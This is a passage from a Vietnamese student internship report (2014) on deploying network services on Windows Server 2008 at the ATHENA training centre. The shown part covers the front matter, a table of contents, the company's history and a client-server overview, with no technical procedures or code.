báo cáo cuối kì

UBND THÀNH PHỐ HỒ CHÍ MINH

TRƢỜNG CAO ĐẲNG CÔNG NGHỆ THỦ ĐỨC

BÁO CÁO THỰC TẬP

NGHIÊN CỨU VÀ TRIỂN KHAI CÁC

DỊCH VỤ MẠNG TRÊN WINDOWS

SERVER 2008

TP. Hồ Chí Minh, Tháng 5 năm 2014.

GV Hƣớng Dẫn: Võ Đỗ Thắng

Sinh Viên: Phạm Văn Huynh

MSSV: 1151TT0196

TRUNG TÂM ĐÀO TẠO MẠNG VÀ

AN NINH MẠNG QUỐC TẾ ATHENA

CÔNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM

Độc lâp – Tự do – Hạnh phúc

NHIỆM VỤ THỰC HIỆN KHÓA LUẬN

Họ tên SV : Phạm Văn Huynh MSSV: 1151TT0196

Chuyên ngành: Công Nghệ Thông Tin.

Tên đề tài: Nghiên cứu triển khai các dịch vụ mạng trên Windows Server

2008.

Nội dung thực hiện:

Lý thuyết:

Nắm vững các bƣớc thực hiện quản trị Windows Server 2008.

Có khả năng tự thiết lập một mạng máy tính, cấu hình mạng, điều chỉnh khả

năng hoạt động mạng máy tính, vận hành hệ thống mạng, giải quyết sự cố, các

phƣơng pháp bảo vệ.

Thực hành:

Cài đặt Windows Server 2008.

Nâng cấp Stand Alone thành Domain controller.

Cài đặt Windows 7.

Join Domain cho windows 7.

Tạo user account trên AD, thiết lập policy cho phép User đƣợc quyền thay đổi

ngày giờ hệ thống.

Backup cho Domain Controller.

Quản lý dịch vụ DNS, Mail, DHCP, Web, VPN trên môi trƣờng Local và

Internet.

Thực hiện kết nối VPN, Mail Server, Web Server trên máy chủ ảo VPS.

Bảo mật Windows với khai thác mã lỗi trên Windows Xp và trên VPS

Thời gian thực hiện: 21/04/2014đến 31/05/2014.

Chữ ký của SV:

TP.HCM, Ngày 31 tháng 5 năm 2014

GIÁM ĐỐC TRUNG TÂM GIẢNG VIÊN HƢỚNG DẪN

(Ký và ghi rõ họ tên) (Ký và ghi rõ họ tên

LỜI CẢM ƠN

Trên thực tế không có sự thành công nào mà không gắn liền với những sự hỗ

trợ, giúp đỡ dù ít hay nhiều, dù trực tiếp hay gián tiếp của ngƣời khác. Trong

suốt thời gian từ khi bắt đầu học tập ở giảng đƣờng đến nay, em đã nhận đƣợc

rất nhiều sự quan tâm, giúp đỡ của quý Thầy Cô, gia đình và bạn bè. Với lời

biết ơn sâu sắc nhất, em xin gửi đến quý Thầy Cô ở Khoa Công Nghệ Thông

Tin - Trƣờng Đại Học Công Nghệ Thông Tin Gia Định Thành Phố Hồ Chí

Minh đã cùng với tri thức và tâm huyết của mình để truyền đạt vốn kiến thức

quý báu cho chúng em trong suốt thời gian học tập tại trƣờng. Và đặc biệt,

trong học kỳ này Khoa đã tổ chức cho chúng em thực tập và đƣợc tiếp cận với

môn học mà theo em là rất hữu ích đối với sinh viên ngành Công Nghệ Thông

Tin.

Em xin chân thành cảm ơn Thầy Võ Đỗ Thắng đã tận tâm hƣớng dẫn chúng

em qua từng buổi thực tập tại Trung Tâm ATHENA cũng nhƣ những buổi nói

chuyện, thảo luận. Nếu không có những lời hƣớng dẫn, dạy bảo của thầy thầy

thì em nghĩ bài báo cáo này của em rất khó có thể hoàn thiện đƣợc. Một lần

nữa, em xin chân thành cảm ơn thầy.

Bài báo cáo đƣợc thực hiện trong khoảng thời gian gần 2 tháng. Bƣớc đầu đi

vào thực tế, tìm hiểu, kiến thức của em còn hạn chế và còn nhiều bỡ ngỡ. Do

vậy, không tránh khỏi những thiếu sót là điều chắc chắn, em rất mong nhận

đƣợc những ý kiến đóng góp quý báu của quý Thầy Cô và các bạn học cùng

lớp để kiến thức của em trong lĩnh vực này đƣợc hoàn thiện hơn.

Sau cùng, em xin kính chúc quý Thầy Cô trong Khoa Công Nghệ Thông Tin

và Thầy Võ Đỗ Thắng thật dồi dào sức khỏe, niềm tin để tiếp tục thực hiện sứ

mệnh cao đẹp của mình là truyền đạt kiến thức cho thế hệ mai sau.

Trân trọng.

TP.HCM, Ngày 31 - 5- 2014

Sinh viên thực hiện

Phạm Văn Huynh

MỤC LỤC

CHƢƠNG 1: CÔNG VIỆC THỰC TẬP……………………………….7

I.Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị

Mạng và An Ninh Mạng Quốc Tế ATHENA. ...................................... 7

1. Trụ sở và các chi nhánh: ............................................................... 8

1.1. Trụ sở chính: .......................................................................... 8

1.2. Cơ sở 2_Tại TP Hồ Chí Minh: ............................................... 8

2. Quá trình hình thành và phát triển của trung tâm: ........................ 8

3. Cơ cấu tổ chức: ........................................................................... 10

4. Các sản phẩm, giải pháp: ............................................................ 10

4.1 Các khóa học dài hạn: ........................................................... 10

4.2 Các khóa học ngắn hạn: ........................................................ 10

4.3 Các sản phẩm khác ................................................................ 11

4.4 Cơ sở hạ tầng......................................................................... 11

4.5 Các dịch vụ hỗ trợ: ................................................................ 11

5. Khách hàng ................................................................................. 12

6. Đối tác ......................................................................................... 12

II. CÁC NHIệM Vụ VÀ DịCH Vụ CủA Bộ PHậN THựC TậP ......... 12

III. CÔNG VIệC VÀ NHIệM Vụ ĐƢợC PHÂN CÔNG ................... 12

IV. THờI GIAN THựC TậP ................................................................ 12

CHƢƠNG 2: NÔI DUNG THỰC TẬP……………………………….12

I.Nhiệm vụ đƣợc giao. ........................................................................ 12

II.Kiến thức tìm hiểu ........................................................................... 13

1. Giải pháp mạng doanh nghiệp .................................................... 13

1.1. Giới thiệu về mạng doanh nghiệp ........................................ 13

1.2. Các thành phần công nghệ trong mạng doanh nghiệp ......... 13

2. Windows Server 2008 ................................................................. 13

Giới thiệu về mô hình Client-Server .............................................. 13

CHƢƠNG 3: TỔNG QUAN VỀ WINDOWS SERVER 2008………..15

I. GIỚI THIỆU WINDOWS SERVER 2008...................................... 15

II. CÁC TÍNH NĂNG CỦA WINDOWS SERVER 2008 ................ 16

1. Công cụ quản trị Server Manager ............................................... 16

2. Windows Server Core ................................................................. 17

3. PowerShell .................................................................................. 17

4. Windows Deloyment Services. ................................................... 18

5. Terminal Services. ...................................................................... 18

6. Network Access Protection ......................................................... 18

7. Read-Only Domain Controllers .................................................. 19

8. Công nghệ Failover Clustering. .................................................. 19

9. Windows Firewall with Advance Security ................................. 20

III. MỘT SỐ TÍNH NĂNG MỚI CỦA WINDOWS SERVER 200820

1. Công nghệ ảo hóa Hyper-V ........................................................ 20

2. Processor Compatibility Mode ................................................... 21

3. File Classification Infrastructure................................................. 21

4. Quản lý trong ỗ đĩa và file: ......................................................... 21

5. Cải tiến giao thức và mã hóa ....................................................... 21

6. Một số tính năng khác ................................................................. 21

IV. CÁC LỢI ÍCH CỦA WINDOWS SERVER 2008 ...................... 22

1. Web ............................................................................................. 22

2. Ảo hóa : ....................................................................................... 22

3. Bảo mật: ...................................................................................... 23

3.1. Network Access Protection (NAP): ..................................... 23

3.2. Read-Only Domain Controller (RODC): ............................. 23

3.3. BitLocker: ............................................................................ 23

3.4. Windows Firewall: ............................................................... 24

V. CÁC PHIÊN BẢN CỦA WINDOWS SERVER 2008 ................ 24

2. Windows Server 2008 Standard Edition ..................................... 24

3. Windows Server 2008 Enterprise Edition .................................. 24

4. Windows Server 2008 Datacenter Edition .................................. 25

5. Windows Web Server 2008 ........................................................ 25

CHƢƠNG 4: CÀI ĐẶT WINDOWS SERVER 2008…………………26

I. YÊU CẦU PHẦN CỨNG ............................................................... 26

II. CÁC CÁCH CÀI ĐẶT .................................................................. 26

III. NÂNG CẤP LÊN WINDOWS SERVER 2008 ........................... 27

IV. CÀI ĐẶT WINDOWS SERVER 2008 ........................................ 27

CHƢƠNG 5: DỰNG DOMAIN CONTROLLER……………………32

CHƢƠNG 6: JOIN DOMAIN…………………………………………44

CHƢƠNG 7: TRIỂN KHAI CÁC DỊCH VỤ MẠNG………………..48

I. DỊCH VỤ DNS ................................................................................ 48

1. Giới thiệu về DNS ....................................................................... 48

2. Cài đặt DNS ................................................................................ 48

3. Cấu hình DNS ............................................................................. 49

II. GIỚI THIỆU DỊCH VỤ DHCP ..................................................... 58

1. Hoạt động của giao thức ............................................................. 58

2. Cài đặt trên windows server 2008 .............................................. 58

3. Cấu hình DHCP .......................................................................... 63

3.1. Tạo Scop ............................................................................. 63

3.2 Thay đổi options của Scope ................................................. .65

CHƢƠNG 8: TRIỂN KHAI VPN……………………………………...67

I. Tìm hiểu VPN……………………………………………………..67

1.Khái niệm……………………………………………………….68

2.Các loại VPN……………………………………………………69

3. Bảo mật trong VPN………………………………………….…69

4.Sản phẩm công nghệ dành cho VPN……………………………69

5. Bộ xử lý trung tâm VPN……………………………….……….69

6.Router dành cho VPN………………………………………....71

7.Tƣờng lửa pix của cisco……………………………………….72

II.VPN site to site…………………………………………………..72

1.Yêu cầu………………………………………………………..72

2.Cài đặt……………………………………………………….....73

CHƢƠNG 9: MAIL TRÊN VPS………………………………………88

I Đăng kí domain……………………………………………………88

II. Mail Server Mdaemon……………………………………………92

1. Định nghĩa……………………………………………………...92

2.Các bƣớc chuẩn bị………………………………………………92

3.Tiến hành………………………………………………………..92

CHƢƠNG 10: WED TRÊN VPS……………………………………..109

I Cài đặt…………………………………………………………….109

1 Chạy xampp……………………………………………………109

2 Tạo xampp……………………………………………………...109

CHƢƠNG 11: THIẾT KẾ WED BẰNG JOOMLA………………….115

I Cài đặt joomla……………………………………………………..115

II Cài đặt template joomla2.5………………………………………121

III Tạo bài viết trong joomla………………………………………124

IV Tạo menu trong joomla………………………………………...128

V Đƣa menu ra trang chủ…………………………………………..133

VI Cài đặt và hiển thị module………………………………………135

VII Cài đặt và hiển thị module tin tức mới nhất……………………143

VIII Cài đặt và hiển thị danh mục tin tức…………………………...146

IX Sử dụng module custom………………………………………..151

X Tích hợp footer vào wedsite…………………………………….153

XI Backup và retore………………………………………………..155

CHƢƠNG 12: BẢO MẬT WINDOWS ……………………………….........................157

I Khai thác lỗ hổng trên windows xp với mã lỗi ms08_067……….157

II Khai thác lỗ hổng trên windows xp với mã lỗi ms12_004…… ..160

CHƢƠNG 13: KẾT LUẬN

I Các kết quả đạt đƣợc……………………………………………..166

II Kinh nghiệm thực tế……………………………………………..167

III Hoàn thiện bản thân……………………………………………..167

IV Các kiến thức đƣợc lĩnh hội…………………………………….167

V Kết luận………………………………………………………….167

LỜI MỞ ĐẦU

Ngày nay với sự phát triển của khoa học kỹ thuật thì máy tính trở nên

phổ biến với mọi ngƣời. Chúng mang lại cho con ngƣời khả năng to lớn và

làm những công việc phi thƣờng: tính toán nhanh và chính xác các bài toán

phức tạp, điều khiển tự động, giải trí… Máy tính ra đời không chỉ hỗ trợ trong

sản xuất mà còn trong việc học tập và làm góp phần giải phóng sức lao động.

Máy tính điện tử là một phát minh, thành tựu to lớn cho sự phát triển của nhân

loại góp phần thúc đẩy mạnh mẽ tiến bộ khoa học và kỹ thuật nói riêng cũng

nhƣ nhân loại nói chung.

Bên cạnh sự phát triển chóng mặt của máy tính trong thời buổi công

nghệ thông tin thì các ứng dụng, dịch vụ mạng là nền tản không thể tách rời.

Sức mạnh máy tính có thể nhân lên gấp nhiều lần khi đƣợc kết nối thành mạng

máy tính. Là cơ sở hạ tần cho phép trao đổi thông tin, truyền tải dữ liệu từ xa

nhằm rút ngắn khoảng cách. Với mạng máy tính toàn cầu chúng ta dễ dàng

tiếp cận với sự phát triển của thế giới trong đó có sự phát triển gần nhất của

Windows Server là Windows Server 2000 và Windows Server 2003 và tiếp

đến là Windows Server 2008 hỗ trợ tốt các dịch vụ mạng cần thiết trên Server,

việc cải tiến không ngừng giúp nâng cao tính ổn định và an toàn hơn cho

Windows Server 2008 hoạt động một cách trơn tru.

Hiện nay quá trình công nghiệp hóa hiện đại hóa đất nƣớc là một chủ

trƣơng hàng đầu của nhà nƣớc. Mạng máy tính trở thành mục tiêu nghiên cứu

và phát triển. Cốt lõi là ngành công nghệ thông tin bao gồm nhiều lĩnh vực từ

kiến trúc mạng đến nguyên lý thiết kế, cài đặt mô hình ứng dụng v.v… Mạng

viễn thông nói chung và mạng máy tính trên nền tảng Windows Server 2008

nói riêng là công cụ hũu dụng không thể thiếu trong bộ máy nhà nƣớc, trƣờng

học, doanh nghiệp… Nó đóng vai trò cầu nối trao đổi thông tin giữa các chính

phủ, tổ chức xã hội và mọi ngƣời với nhau.

Qua thời gian học tập và nghiên cứu trên ghế nhà trƣờng cùng với sự hỗ

trợ tận tình của Thầy cô, bạn bè và ngƣời thân đã giúp em thu thập đƣợc nhiều

kiến thức quý báo. Đặc biệt là quá trình thực tập tại Trung tâm ATHENA giúp

em có những trải nghiệm vô cùng thú vị và bổ ích. Với mong muốn tìm hiểu

về mạng máy tính và góp phần xây dựng một mạng máy tính thân thiện, thông

minh cho mọi ngƣời sử dụng.

Tuy đã có nhiều cố gắng song không thể tránh những khuyết điểm, sai

sót vì thế mong đƣợc sự thông cảm và những ý kiến đóng góp quý báo từ Quý

Thầy Cô, bạn bè, bạn đọc, ngƣời thân để em có thể ngày một hoàn thiện bản

thân mình hơn. Xin chân thành cảm ơn!

Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP

7

Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008

CHƢƠNG 1: CÔNG VIỆC THỰC TẬP.

I.Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị Mạng và

An Ninh Mạng Quốc Tế ATHENA.

Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền

thân là Công ty TNHH Tƣ vấn và Đào tạo quản trị mạng Việt Năng, (tên thƣơng hiệu viết

tắt là TRUNG TÂM ĐÀO TẠO ATHENA), đƣợc chính thức thành lập theo giấy phép

kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tƣ Tp Hồ Chí Minh cấp ngày 04 tháng

11 năm 2008.

Tên công ty viết bằng tiếng nƣớc ngoài: ATHENA ADVICE TRAINING

NETWORK SECURITY COMPANY LIMITED.

ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt

huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin. Với quyết tâm góp phần vào

công cuộc thúc đẩy tiến trình tin học hóa của nƣớc nhà. ATHENA đã và đang tập trung

chủ yếu vào các họat động sau:

Đào tạo chuyên sâu quản trị mạng, an ninh mạng, thƣơng mại điện tử theo các tiêu

chuẩn quốc tế của các hãng nổi tiếng nhƣ Microsoft, Cisco, Oracle, Linux LPI , CEH,...

Song song đó, trung tâm ATHENA còn có những chƣơng trình đào tạo cao cấp dành

riêng theo đơn đặt hàng của các đơn vị nhƣ Bộ Quốc Phòng, Bộ Công An , ngân hàng,

doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính..Qua đó cung cấp nguồn nhân lực

trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia về mạng máy tính và bảo mật

mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp có nhu cầu.

Tƣ vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản xuất

kinh doanh.

Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở dữ

liệu thông tin về các ứng dụng và sự cố mạng.

Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trƣờng hợp xảy ra sự cố

máy tính.

Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là

chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành

nhƣ Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền

Thông các tỉnh, bƣu điện các tỉnh,…

Ngoài ra, Trung tâm ATHENA còn có nhiều chƣơng trình hợp tác và trao đổi công

nghệ với nhiều đại học lớn nhƣ đại học Bách Khoa Thành Phố Hồ Chí Minh, HọcViệnAn


8


Ninh Nhân Dân( Thủ Đức), Học Viện Bƣu Chính Viễn Thông, Hiệp hội an toàn thông

tin (VNISA), Viện Kỹ Thuật Quân Sự...

1. Trụ sở và các chi nhánh:

1.1. Trụ sở chính:

Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.

Số 2 Bis Đinh Tiên Hoàng, Phƣờng Đa Kao, Tp Hồ Chí Minh, Việt Nam.

Điện thoại: ( 84-8 ) 3824 4041

Hotline: 0943 23 00 99.

1.2.Cơ sở 2_Tại TP Hồ Chí Minh:

Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA

92 Nguyễn Đình Chiểu ,Phƣờng Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam.

Website: www.athena.edu.vn

Điện thoại: ( 84-8 ) 2210 3801

Hotline: 0943 20 00 88.

2.Quá trình hình thành và phát triển của trung tâm:

Một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh

vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền công nghệ

thông tin nƣớc nhà. Họ là những cá nhân có trình độ chuyên môn cao và có đầu óc lãnh

đạo cùng với tầm nhìn xa về tƣơng lai của ngành công nghệ thông tin trong tƣơng lai, họ

đã quy tụ đƣợc một lực lƣợng lớn đội ngũ công nghệ thông tin trƣớc hết là làm nhiệm vụ

ứng cứu máy tính cho các doanh nghiệp, cá nhân có nhu cầu. Bƣớc phát triển tiếp theo là

vƣơn tầm đào đạo đội ngũ cán bộ công nghệ thông tin cho đất nƣớc và xã hội.

Các thành viên sáng lập trung tâm gồm:

Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena,

hiện tại là giám đốc dự án của công ty Siemen Telecom.

Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thƣơng mại Công ty

EIS, Phó Tổng công ty FPT.

Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu

trách nhiệm công nghệ thông tin của Ngân hàng.

Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an

ninh mạng Athena.

Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy tính

gần 100 thành viên hoạt động nhƣ là một nhóm, một tổ chức ứng cứu máy tính miền

Nam.

http://www.athena.edu.vn/


9


Từ năm 2004- 2006: Trung tâm có nhiều bƣớc phát triển và chuyển mình. Trung

tâm trở thành một trong những địa chỉ tin cậy của nhiều doanh nghiệp nhằm cài đặt hệ

thống an ninh mạng và đào tạo cho đội ngũ nhân viên của các doanh nghiệp về các

chƣơng trình quản lý dự án MS Project 2003, kỹ năng thƣơng mại điện tử, bảo mật

web… và là địa chỉ tin cậy của nhiều học sinh_sinh viên đến đăng kí học. Đòi hỏi cấp

thiết trong thời gian này của Trung tâm là nâng cao hơn nữa đội ngũ giảng viên cũng nhƣ

cơ sở để đáp ứng nhu cầu ngày càng cao về công nghệ thông tin của đất nƣớc nói chung,

các doanh nghiệp, cá nhân nói riêng.Năm 2004, công ty mở rộng hoạt động cung cấp giải

pháp, dịch vụ cho khu vực miền Trung thông qua việc thành lập văn phòng đại diện tại

Đà Nẵng.

Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena mở ra thêm

một chi nhánh tại Cƣ xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội ngũ giảng

viên là những chuyên gia an ninh mạng tốt nghiệp các trƣờng đại học và học viện công

nghệ thông tin uy tín trên toàn quốc, đồng thời trong thời gian này Athena có nhiều chính

sách ƣu đãi nhằm thu hút đội ngũ nhân lực công nghệ thông tin lành nghề từ các doanh

nghiệp, tổ chức, làm giàu thêm đội ngũ giảng viên của trung tâm.

Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc

lên, cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm rơi vào nhiều

khó khăn. Ông Nguyễn Thế Đông cùng Ông Hứa Văn Thế Phúc rút vốn khỏi công ty gây

nên sự hoang man cho toàn bộ hệ thống trung tâm. Cộng thêm chi nhánh tại Cƣ xã

Nguyễn Văn Trỗi hoạt động không còn hiệu quả phải đóng cửa làm cho trung tâm rơi từ

khó khăn này đến khó khăn khác. Lúc này, với quyết tâm khôi phục lại công ty cũng nhƣ

tiếp tục sứ mạng góp phần vào tiến trình tin học hóa của đất nƣớc. Ông Võ Đỗ Thắng

mua lại cổ phần của hai nhà đầu tƣ lên làm giám đốc và xây dựng lại trung tâm. Đây là

một bƣớc chuyển mình có ý nghĩa chiến lƣợc của trung tâm. Mở ra một làn gió mới và

một giai đoạn mới, cùng với quyết tâm mạnh mẽ và một tinh thần thép đãgiúp ông Thắng

vƣợt qua nhiều khó khăn ban đầu, giúp trung tâm đứng vững trong thời kì khủng hoảng.

Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lƣợc. Trung

tâm đào tạo quản trị và an ninh mạng dần đƣợc phục hồi và trở lại quỹ đạo hoạt động của

mình. Đến nay, Trung tâm đã trở thành một trong những trung tâm đào tạo quản trị mạng

hàng đầu Việt Nam. Cùng với sự liên kết của rất nhiều công ty, tổ chức doanh nghiệp,

trung tâm trở thành nơi đào tạo và cung cấp nguồn nhân lực công nghệ thông tin cho xã

hội. Từng bƣớc thực hiện mục tiêu góp phần vào tiến trình tin học hóa nƣớc nhà.


10


3.Cơ cấu tổ chức:

Hình 1. Sơ đồ tổ chức công ty.

4.Các sản phẩm, giải pháp:

4.1Các khóa học dài hạn:

- Chƣơng trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network security

specialist.

- Chƣơng trình Quản trị viên an ninh mạng (ANST) Athena netuwork security Technician.

- Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager Administrator.

4.2Các khóa học ngắn hạn:

Khóa Quản trị mạng :

- Quản trị mạng Microsoft căn bản ACBN

- Phần cứng máy tính, laptop, server

- Quản trị hệ thống mạng Microsoft MCSA Security.

- Quản trị mạng Microsoft nâng cao MCSE

- Quản trị window Vista

- Quản trị hệ thống Window Server 2008, 2012

- Lớp Master Exchange Mail Server

- Quản trị mạng quốc tế Cissco CCNA


11


- Quản trị hệ thống mạng Linux 1 và Linux 2.

Khóa thiết kế web và bảo mật mạng

- Xây dựng, quản trị web thƣơng mại điện tử với Joomla và VirtuMart

- Lập trình web với Php và MySQL

- Bảo mật mạng quốc tế ACNS

- Hacker mũ trắng

- Athena Mastering Firewall Security

- Bảo mật website.

4.3 Các sản phẩm khác

- Chuyên đề thực hành sao lƣu và phục hồi dữ liệu

- Chuyên đề thực hành bảo mật mạng Wi_Fi

- Chuyên đề Ghost qua mạng

- Chuyên đề xây dựng và quản trị diễn đàn

- Chuyên đề bảo mật dữ liệu phòng chống nội gián

- Chuyên đề quản lý tài sản công nghệ thông tin

- Chuyên đề kỹ năng thƣơng mại điện tử.

4.4 Cơ sở hạ tầng

- Thiết bị đầy đủ và hiện đại.

- Chƣơng trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công nghệ mới

nhất.

- Phòng máy rộng rãi, thoáng mát.

4.5 Các dịch vụ hỗ trợ:

- Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn

- Giới thiệu việc làm cho mọi học viên

- Thực tập có lƣơng cho học viên khá giỏi

- Ngoài giờ học chính thức, học viên đƣợc thực hành thêm miễn phí, không giới hạn thời

gian

- Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính, mạng

máy tính, bảo mật mạng


12


Hỗ trợ thi Chứng chỉ Quốc tế.

5.Khách hàng

- Mọi đối tƣợng chuyên hoặc không chuyên về CNTT.

- Khách hàng chủ yếu của ATHENAlà các bạn học sinh, sinh viên và các cán bộ công

nhân viên chức yêu thích lĩnh vực công nghệ thông tin.

6.Đối tác

Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp nhân sự

CNTT, quản trị mạng , an ninh mạng chất lƣợng cao theo đơn đặt hàng cho các

đơn vị nhƣ ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính...

II.CÁC NHIệM Vụ VÀ DịCH Vụ CủA Bộ PHậN THựC TậP

Bộ phận thực tập : Bộ phận triển khai kỹ thuật.

Nhiệm vụ và dịch vụ:

Triển khai lắp đặt hệ thống mạng.

Bảo trì hệ thống mạng.

Tƣ vấn hỗ trợ quản trị hệ thống mạng.

III.CÔNG VIệC VÀ NHIệM Vụ ĐƢợC PHÂN CÔNG

Nghiên cứu các dịch vụ mạng trên Windows Server 2008.

Triển khai các dịch vụ mạng trên Windows Server 2008.

Yêu cầu nhiệm vụ: Có kiến thức tốt về Network, System, Security.

IV.THờI GIAN THựC TậP

Từ ngày 21/04/2014 đến ngày 31/05/2014.

CHƢƠNG 2: NÔI DUNG THỰC TẬP.

I.Nhiệm vụ đƣợc giao.

Nghiên cứu các dịch vụ mạng trên Windows Server 2008

Triển khai các dịch vụ mạng trên Windows Server 2008

http://tuyendung.com.vn/timvieclam/jobresult.aspx?jobmustmatch=1&keyword=qu%E1%BA%A3n%20tr%E1%BB%8B%20m%E1%BA%A1ng


13


II.Kiến thức tìm hiểu

1.Giải pháp mạng doanh nghiệp

1.1.Giới thiệu về mạng doanh nghiệp

Hệ thống mạng của doanh nghiệp đơn giản hay phức tạp là tùy theo quy mô và

loại hình của doanh nghiệp. Ngày nay, các nhà cung ứng đã đƣa ra rất nhiều sự chọn lựa

cho doanh nghiệp nhƣ cho phép doanh nghiệp tự trang bị, tự quản lý hoặc sử dụng dịch

vụ. Những doanh nghiệp lớn với hàng ngàn máy tính cũng có những giải pháp quản lý

đặc thù kết hợp cả phần cứng và phần mềm.

Hầu hết các doanh nghiệp đều có nhu cầu sử dụng các ứng dụng công nghệ thông tin

(CNTT) ở những mức độ khác nhau. Do vậy, họ sẽ có những nhu cầu khác nhau về quản

trị hệ thống mạng (network) của doanh nghiệp. Một hệ thống đƣợc kiểm soát tốt sẽ làm

giảm đáng kể chi phí hoạt động, nâng cao hiệu quả cũng nhƣ độ tin cậy của hệ thống.

1.2.Các thành phần công nghệ trong mạng doanh nghiệp

Tùy vào qui mô lớn hay nhỏ của doanh nghiệp mà ta sẽ có những giải pháp công

nghệ và thiết kế sao cho phù hợp nhất.

Hiện nay, hầu hết các ứng dụng mới đều yêu cầu rất nhiều tài nguyên của hệ thống và

băng thông mạng, cũng nhƣ các yêu cầu về điều khiển, giám sát mạng. Vậy làm thế nào

để một doanh nghiệp vừa và nhỏ, với một số vốn đầu tƣ ban đầu hạn chế, có thể tiếp cận

đƣợc với các công nghệ hiện đại, bắt kịp sự phát triển của thế giới.

2.Windows Server 2008

Giới thiệu về mô hình Client-Server

Điều đáng ngạc nhiên là nhiều công ty ngày nay vẫn không quan tâm đến việc

thực hiện một mạng lƣới client/server. Thay vào đó họ chỉ tiếp tục thêm vào các máy

trạm để thực hiện mô hình mạng peer-to-peer. Mạng peer-to-peer không cung cấp cho

bạn nhiều cách bảo mật và chia sẽ tài nguyên. Vì vậy, không có gì ngạc nhiên khi họ

thƣờng có vấn đề với việc truy cập vào máy trạm, bị mất dữ liệu do virus, spyware hay

phải trải nghiệm việc internet bị gián đoạn. Máy tính nối mạng theo mô hình peer-to-peer

là đủ khi bạn chỉ có một vài ngƣời dung trên mạng, nhƣng khi có nhiều hơn 5 hoặc 6

ngƣời sử dụng trên mạng của bạn, bạn thực sự phải xem xét đầu tƣ một máy chủ mạng.


14


Vậy lợi ích của mô hình Client-Server cụ thể là gì?

- Tập tin và an ninh mạng: Vai trò quan trọng nhất của một máy chủ tập tin là an ninh

mạng mà nó cung cấp. Bằng cách tạo ra các tài khoản ngƣời dùng cá nhân và nhóm, có

thể cấp quyền cho nhóm và cá nhân khai thác dữ liệu đƣợc lƣu trữ trên mạng, ngăn chặn

ngƣời sử dụng trái phép truy cập tài liệu mà họ không nên xem. Ví dụ, trong Folder

chung thì group ketoan và group nhansu có quyền truy cập ủa nhân viên…

- Tăng độ tin cậy, giảm sự gián đoạn công việc: Nhiều máy chủ đƣợc trang bị nguồn

điện dự phòng. Với một nguồn cung cấp năng lƣợng thứ cấp chạy song song, sự mất mát

của một trong những nguồn cung cấp điện không ảnh hƣởng đến hoạt động hệ thống bình

thƣờng. Cũng vậy với hệ thống lƣu trữ của máy chủ. Không giống nhƣ một máy tính để

bàn trung bình có sử dụng một ổ cứng duy nhất, một máy chủ sẽ thƣờng sử dụng nhiều ổ

đĩa cứng làm việc trong một RAID cấu hình để ngăn ngừa mất dữ liệu hoặc một sự gián

đoạn trong quy trình làm việc. Ngoài ra, nhiều máy chủ cũng đƣợc trang bị ổ đĩa cứng hot

swappable và nguồn cung cấp điện. Các thành phần này có thể thay thế nóng cho phép

bạn thay thế phần cứng bị lỗi mà không gián đoạn toàn bộ văn phòng. Ngoài ra, kể từ khi

tất cả các dữ liệu nhân viên đang đƣợc lƣu trữ trên mạng, nếu máy trạm của ngƣời dùng

không giữa ngày làm việc, nhân viên có thể truy cập các tập tin tƣơng tự từ máy trạm

khác.

- Tập trung lƣu trữ dữ liệu và tài nguyên chia sẻ: Với một máy chủ mạng, tất cả ngƣời

dùng trên mạng có thể sử dụng các tài nguyên mạng khác nhau ngay từ bàn làm việc,

tăng hiệu quả. Một số trong những nguồn tài nguyên bao gồm:

o Tập trung lƣu trữ dữ liệu ( RAID Array )

o Network Attached Storage (NAS) thiết bị

o Tháp đĩa CD / DVD

o Máy in và máy chủ Fax

- Quản lý virus : Một trong những mối đe dọa lớn nhất đối với mạng của bạn là khả năng

lây nhiễm từ virus, phần mềm gián điệp và thƣ rác. Vì vậy, có tốt, cập nhật, phần mềm

